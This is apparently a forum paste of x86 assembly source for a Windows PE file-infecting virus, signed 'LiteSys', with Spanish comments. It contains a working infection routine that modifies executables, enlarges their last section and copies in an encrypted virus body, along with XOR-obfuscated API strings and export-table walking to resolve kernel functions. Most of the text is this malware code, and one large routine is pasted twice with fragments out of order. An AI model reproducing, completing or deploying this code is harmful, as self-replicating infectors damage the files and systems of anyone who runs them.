GetTickCount DD 4E4E4E4Eh
GetWindowsDirectoryA DD 4E4E4E4Eh
WinDir_Infectado DB 4Eh
MEMORIA DD 4E4E4E4Eh
FHANDLE DD 4E4E4E4Eh
MHANDLE DD 4E4E4E4Eh
BASEMAP DD 4E4E4E4Eh
TAMA DD 4E4E4E4Eh
SRAWDATA DD 4E4E4E4Eh
EP_VIEJO DD 4E4E4E4Eh
EXPORTS DD 4E4E4E4Eh
GPA DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "P" XOR 4Eh
DB "r" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB "A" XOR 4Eh
DB "d" XOR 4Eh
DB "d" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "s" XOR 4Eh
DB "s" XOR 4Eh
DB 4Eh
Largo_GPA EQU $-GPA
Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (4Eh)
Tabla_APIs_KERNEL32 DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "p" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "g" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "U" XOR 4Eh
DB "n" XOR 4Eh
DB "m" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB "H" XOR 4Eh
DB "a" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
atm2001 2002-06-29
- 打赏
- 举报
POPAD
RET
_ERROR_APIs:
XOR EAX, EAX
DEC EAX
RET
BUSCA_APIs ENDP
; Proceso para infectar un archivo PE.
; Expande la ultima secci del PE.
;
; EBX -> Puntero al archivo a infectar.
INFECTA_EXE PROC
PUSHAD
PUSH DWORD PTR [EBP + RETORNA]
POP DWORD PTR [EBP + EP_VIEJO]
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
CALL [EBP + CreateFileA]
MOV DWORD PTR [EBP + FHANDLE], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
CALL [EBP + GetFileSize]
MOV DWORD PTR [EBP + TAMA], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX
ADD EAX, TAMA_VIRUS+1000h
PUSH EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CreateFileMappingA]
MOV DWORD PTR [EBP + MHANDLE], EAX
OR EAX, EAX
JZ _FIN_INFEXE
POP EDX
XOR EBX, EBX
PUSH EDX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_WRITE
PUSH EAX
CALL [EBP + MapViewOfFile]
MOV DWORD PTR [EBP + BASEMAP], EAX
OR EAX, EAX
JZ _TERMINADA
MOV EDI, EAX
MOV BX, WORD PTR [EDI]
XOR BX, 6666h
SUB BX, 3C2Bh ; "ZM" XOR 6666h & SUB
JNZ _TERMINADA
MOV EDX, EDI
ADD EDX, DWORD PTR [EDI+3Ch]
CMP EDX, DWORD PTR [EBP + BaseMap]
JB _TERMINADA
MOV EBX, DWORD PTR [EBP + BASEMAP]
ADD EBX, DWORD PTR [EBP + TAMA]
CMP EDX, EBX
JA _TERMINADA
ADD EDI, DWORD PTR [EDI+3Ch]
MOV BX, WORD PTR [EDI]
XOR BX, 2121h
SUB BX, 6471h ; "EP" XOR 6666h & SUB
JNZ _TERMINADA
CMP DWORD PTR [EDI+4Ch], "amlA" ; "Alma" marca de infeccion.
JZ _TERMINADA
MOV DWORD PTR [EDI+4Ch], "amlA"
MOV ESI, EDI
ADD ESI, 18h
MOVZX EAX, WORD PTR [EDI+14h]
ADD ESI, EAX
XOR ECX, ECX
MOVZX ECX, WORD PTR [EDI+06h]
DEC ECX
IMUL ECX, ECX, 28h ; ultima seccion
ADD ESI, ECX
PUSH DWORD PTR [ESI+10h]
POP DWORD PTR [EBP + SRAWDATA] ; sizeofrawdata.
MOV EAX, DWORD PTR [ESI+8h]
PUSH EAX
ADD EAX, TAMA_VIRUS ; ajustar
MOV DWORD PTR [ESI+8h], EAX
MOV EBX, DWORD PTR [EDI+3Ch] ; alignment.
XOR EDX, EDX
DIV EBX
INC EAX
MUL EBX
MOV DWORD PTR [ESI+10h], EAX
POP EBX
MOV EAX, DWORD PTR [EDI+28h]
ADD EAX, DWORD PTR [EDI+34h]
MOV DWORD PTR [EBP + RETORNA], EAX
ADD EBX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+28h], EBX
OR DWORD PTR [ESI+24h], 0A0000020h ; caracteristicas
MOV EAX, DWORD PTR [ESI+10h]
ADD EAX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+50h], EAX ; ImageSize.
; copiar virus...
MOV EDI, DWORD PTR [ESI+14h]
ADD EDI, DWORD PTR [ESI+8h]
PUSH TAMA_VIRUS
POP ECX
SUB EDI, ECX
ADD EDI, [EBP + BASEMAP]
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH TAMA_VIRUS + 100h
PUSH NULL
CALL [EBP + VirtualAlloc]
MOV DWORD PTR [EBP + MEMORIA], EAX
OR EAX, EAX
JZ _TERMINADA
PUSHAD
MOV EDI, EAX
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
RDTSC
IMUL EAX, EAX
NEG EAX
MOV DWORD PTR [EBP + LLAVE2A], EAX
PUSH EAX
RDTSC
ADC EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2B], EAX
PUSH EAX
CALL [EBP + GetTickCount]
IMUL EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2C], EAX
XCHG EDX, EAX
POP EBX
POP EAX
; LLAVE2A -> EAX
; LLAVE2B -> EBX
; LLAVE2C -> EDX
PUSHAD
CALL Desencriptar_Datos
POPAD
@JOJOJO:
MOVSD
MOVSD
MOVSD
XOR DWORD PTR [EDI-0Ch], EAX
ADD DWORD PTR [EDI-08h], EBX
SUB DWORD PTR [EDI-04h], EDX
LOOP @JOJOJO
PUSHAD
CALL Desencriptar_Datos
POPAD
PUSH TAMA_DEC2
POP ECX
REP MOVSB
POPAD
@ReGen:
RDTSC
IMUL EAX, EAX
MOV BYTE PTR [EBP + LLAVEX], AL
OR AL, AL
JZ @ReGen
LEA ESI, OFFSET [EBP + EMPIEZA_VIRUS]
PUSH TAMA_DESENCRIPTOR
POP ECX
REP MOVSB
MOV ESI, DWORD PTR [EBP + MEMORIA]
MOV ECX, TAMA_ENCRIPTADO
PUSHAD
CALL Desencriptar_Datos
POPAD
@@CC:
MOVSB
SUB BYTE PTR [EDI-1h], AL
DEC AL
LOOP @@CC
PUSHAD
CALL Desencriptar_Datos
POPAD
ADD DWORD PTR [EBP + TAMA], TAMA_VIRUS+1000h
_TERMINADA:
PUSH DWORD PTR [EBP + BASEMAP]
CALL [EBP + UnmapViewOfFile]
PUSH DWORD PTR [EBP + MHANDLE]
CALL [EBP + CloseHandle]
XOR EBX, EBX
PUSH EBX
PUSH EBX
MOV EAX, DWORD PTR [EBP + TAMA]
PUSH EAX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetFilePointer]
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetEndOfFile]
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CloseHandle]
_FIN_INFEXE:
PUSH DWORD PTR [EBP + EP_VIEJO]
POP DWORD PTR [EBP + RETORNA]
POPAD
RET
INFECTA_EXE ENDP
RET
_ERROR_APIs:
XOR EAX, EAX
DEC EAX
RET
BUSCA_APIs ENDP
; Proceso para infectar un archivo PE.
; Expande la ultima secci del PE.
;
; EBX -> Puntero al archivo a infectar.
INFECTA_EXE PROC
PUSHAD
PUSH DWORD PTR [EBP + RETORNA]
POP DWORD PTR [EBP + EP_VIEJO]
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
CALL [EBP + CreateFileA]
MOV DWORD PTR [EBP + FHANDLE], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
CALL [EBP + GetFileSize]
MOV DWORD PTR [EBP + TAMA], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX
ADD EAX, TAMA_VIRUS+1000h
PUSH EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CreateFileMappingA]
MOV DWORD PTR [EBP + MHANDLE], EAX
OR EAX, EAX
JZ _FIN_INFEXE
POP EDX
XOR EBX, EBX
PUSH EDX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_WRITE
PUSH EAX
CALL [EBP + MapViewOfFile]
MOV DWORD PTR [EBP + BASEMAP], EAX
OR EAX, EAX
JZ _TERMINADA
MOV EDI, EAX
MOV BX, WORD PTR [EDI]
XOR BX, 6666h
SUB BX, 3C2Bh ; "ZM" XOR 6666h & SUB
JNZ _TERMINADA
MOV EDX, EDI
ADD EDX, DWORD PTR [EDI+3Ch]
CMP EDX, DWORD PTR [EBP + BaseMap]
JB _TERMINADA
MOV EBX, DWORD PTR [EBP + BASEMAP]
ADD EBX, DWORD PTR [EBP + TAMA]
CMP EDX, EBX
JA _TERMINADA
ADD EDI, DWORD PTR [EDI+3Ch]
MOV BX, WORD PTR [EDI]
XOR BX, 2121h
SUB BX, 6471h ; "EP" XOR 6666h & SUB
JNZ _TERMINADA
CMP DWORD PTR [EDI+4Ch], "amlA" ; "Alma" marca de infeccion.
JZ _TERMINADA
MOV DWORD PTR [EDI+4Ch], "amlA"
MOV ESI, EDI
ADD ESI, 18h
MOVZX EAX, WORD PTR [EDI+14h]
ADD ESI, EAX
XOR ECX, ECX
MOVZX ECX, WORD PTR [EDI+06h]
DEC ECX
IMUL ECX, ECX, 28h ; ultima seccion
ADD ESI, ECX
PUSH DWORD PTR [ESI+10h]
POP DWORD PTR [EBP + SRAWDATA] ; sizeofrawdata.
MOV EAX, DWORD PTR [ESI+8h]
PUSH EAX
ADD EAX, TAMA_VIRUS ; ajustar
MOV DWORD PTR [ESI+8h], EAX
MOV EBX, DWORD PTR [EDI+3Ch] ; alignment.
XOR EDX, EDX
DIV EBX
INC EAX
MUL EBX
MOV DWORD PTR [ESI+10h], EAX
POP EBX
MOV EAX, DWORD PTR [EDI+28h]
ADD EAX, DWORD PTR [EDI+34h]
MOV DWORD PTR [EBP + RETORNA], EAX
ADD EBX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+28h], EBX
OR DWORD PTR [ESI+24h], 0A0000020h ; caracteristicas
MOV EAX, DWORD PTR [ESI+10h]
ADD EAX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+50h], EAX ; ImageSize.
; copiar virus...
MOV EDI, DWORD PTR [ESI+14h]
ADD EDI, DWORD PTR [ESI+8h]
PUSH TAMA_VIRUS
POP ECX
SUB EDI, ECX
ADD EDI, [EBP + BASEMAP]
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH TAMA_VIRUS + 100h
PUSH NULL
CALL [EBP + VirtualAlloc]
MOV DWORD PTR [EBP + MEMORIA], EAX
OR EAX, EAX
JZ _TERMINADA
PUSHAD
MOV EDI, EAX
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
RDTSC
IMUL EAX, EAX
NEG EAX
MOV DWORD PTR [EBP + LLAVE2A], EAX
PUSH EAX
RDTSC
ADC EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2B], EAX
PUSH EAX
CALL [EBP + GetTickCount]
IMUL EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2C], EAX
XCHG EDX, EAX
POP EBX
POP EAX
; LLAVE2A -> EAX
; LLAVE2B -> EBX
; LLAVE2C -> EDX
PUSHAD
CALL Desencriptar_Datos
POPAD
@JOJOJO:
MOVSD
MOVSD
MOVSD
XOR DWORD PTR [EDI-0Ch], EAX
ADD DWORD PTR [EDI-08h], EBX
SUB DWORD PTR [EDI-04h], EDX
LOOP @JOJOJO
PUSHAD
CALL Desencriptar_Datos
POPAD
PUSH TAMA_DEC2
POP ECX
REP MOVSB
POPAD
@ReGen:
RDTSC
IMUL EAX, EAX
MOV BYTE PTR [EBP + LLAVEX], AL
OR AL, AL
JZ @ReGen
LEA ESI, OFFSET [EBP + EMPIEZA_VIRUS]
PUSH TAMA_DESENCRIPTOR
POP ECX
REP MOVSB
MOV ESI, DWORD PTR [EBP + MEMORIA]
MOV ECX, TAMA_ENCRIPTADO
PUSHAD
CALL Desencriptar_Datos
POPAD
@@CC:
MOVSB
SUB BYTE PTR [EDI-1h], AL
DEC AL
LOOP @@CC
PUSHAD
CALL Desencriptar_Datos
POPAD
ADD DWORD PTR [EBP + TAMA], TAMA_VIRUS+1000h
_TERMINADA:
PUSH DWORD PTR [EBP + BASEMAP]
CALL [EBP + UnmapViewOfFile]
PUSH DWORD PTR [EBP + MHANDLE]
CALL [EBP + CloseHandle]
XOR EBX, EBX
PUSH EBX
PUSH EBX
MOV EAX, DWORD PTR [EBP + TAMA]
PUSH EAX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetFilePointer]
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetEndOfFile]
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CloseHandle]
_FIN_INFEXE:
PUSH DWORD PTR [EBP + EP_VIEJO]
POP DWORD PTR [EBP + RETORNA]
POPAD
RET
INFECTA_EXE ENDP
atm2001 2002-06-29
- 打赏
- 举报
Mi_Firma DB "[" XOR 4Eh
DB "D" XOR 4Eh
DB "e" XOR 4Eh
DB "s" XOR 4Eh
DB "i" XOR 4Eh
DB "g" XOR 4Eh
DB "n" XOR 4Eh
DB "e" XOR 4Eh
DB "d" XOR 4Eh
DB " " XOR 4Eh
DB "b" XOR 4Eh
DB "y" XOR 4Eh
DB " " XOR 4Eh
DB "L" XOR 4Eh
DB "i" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "S" XOR 4Eh
DB "y" XOR 4Eh
DB "s" XOR 4Eh
DB "]" XOR 4Eh
; Proceso para buscar la base del KERNEL32
;
; EDI -> llamada del stack...
BUSCA_KERNEL32 PROC
AND EDI, 0FFFF0000h
PUSH PAGINAS
POP ECX
CHEQUEA:
PUSH EDI
CMP BYTE PTR [EDI], "M"
JNE SIGUE
ADD EDI, [EDI+3Ch]
CMP BYTE PTR [EDI], "P"
JE MESMO
SIGUE:
POP EDI
SUB EDI, 1000h
LOOP CHEQUEA
PUSH KERNEL_9X
MESMO:
POP EAX
RET
BUSCA_KERNEL32 ENDP
; Funcion para Encriptar/Desencriptar los datos.
; Llave estatica.
Desencriptar_Datos:
LEA EDI, OFFSET [EBP + CRIPTA2]
MOV ECX, L_CRIPTA2
@DCR:
XOR BYTE PTR [EDI], 4Eh
INC EDI
LOOP @DCR
RET
; Proceso para buscar el handle de GetProcAddress.
; Se debe buscar primero el handle del kernel32.
BUSCA_GPA PROC
MOV EBX, DWORD PTR [EBP + KERNEL32]
MOV ESI, EBX
ADD ESI, DWORD PTR [ESI+3Ch]
MOV ESI, DWORD PTR [ESI+78h]
ADD ESI, EBX ; Obtiene tabla de exportaciones.
MOV DWORD PTR [EBP + EXPORTS], ESI
MOV ECX, DWORD PTR [ESI+18h]
DEC ECX
MOV ESI, DWORD PTR [ESI+20h]
ADD ESI, EBX
XOR EAX, EAX
BUX:
MOV EDI, DWORD PTR [ESI]
ADD EDI, EBX
PUSH ESI
LEA ESI, OFFSET [EBP + GPA]
COMP:
PUSH ECX
PUSH Largo_GPA
POP ECX
REP CMPSB
JE GPA_LISTO
POP ECX
INC EAX
POP ESI
ADD ESI, 4h
LOOP BUX
JMP ASUME_HARDCODE
GPA_LISTO:
POP ESI
POP ECX
MOV EDI, DWORD PTR [EBP + EXPORTS]
ADD EAX, EAX
MOV ESI, DWORD PTR [EDI+24h]
ADD ESI, EBX
ADD ESI, EAX
MOVZX EAX, WORD PTR [ESI]
IMUL EAX, EAX, 4h
MOV ESI, DWORD PTR [EDI+1Ch]
ADD ESI, EBX
ADD ESI, EAX
MOV EAX, DWORD PTR [ESI]
ADD EAX, EBX
RET
ASUME_HARDCODE:
PUSH GPA_HARDCODE
POP EAX
RET
BUSCA_GPA ENDP
; Proceso para buscar el handle de cada una de las
; APIs.
;
; EBX -> Modulo.
; EDI -> Cadenas de las APIs.
; ESI -> DWords para guardar las rva.
BUSCA_APIs PROC
PUSHAD
B1:
PUSH EDI
PUSH EBX
CALL [EBP + GetProcAddress]
OR EAX, EAX
JZ _ERROR_APIs
MOV DWORD PTR [ESI], EAX
ADD ESI, 4h
XOR AL, AL
REPNZ SCASB
CMP BYTE PTR [EDI], 0FFh
JNZ B1
